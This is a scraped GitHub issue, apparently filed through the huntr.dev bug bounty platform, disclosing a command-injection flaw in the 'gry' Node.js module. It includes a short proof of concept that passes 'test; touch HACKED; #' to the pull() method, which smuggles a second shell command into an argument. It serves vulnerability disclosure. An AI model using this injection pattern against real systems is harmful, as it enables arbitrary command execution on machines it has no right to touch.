We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/IonicaBizau/node-gry/blob/master/lib/index.js#L149
user input
command
// poc.js const Repo = require("gry"); var myRepo = new Repo("."); myRepo.pull('test; touch HACKED; #', function(){console.log('Finished!')})
HACKED
npm i gry # Install affected module node poc.js # Run the PoC
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
The text was updated successfully, but these errors were encountered:
@IonicaBizau Resolved with #23?
Sorry, something went wrong.
No branches or pull requests
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Vulnerability Description
The issue occurs because a
user input
is formatted inside acommand
that will be executed without any check. The issue arises here: https://github.com/IonicaBizau/node-gry/blob/master/lib/index.js#L149Steps To Reproduce:
HACKED
HACKED
has been createdBug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
The text was updated successfully, but these errors were encountered: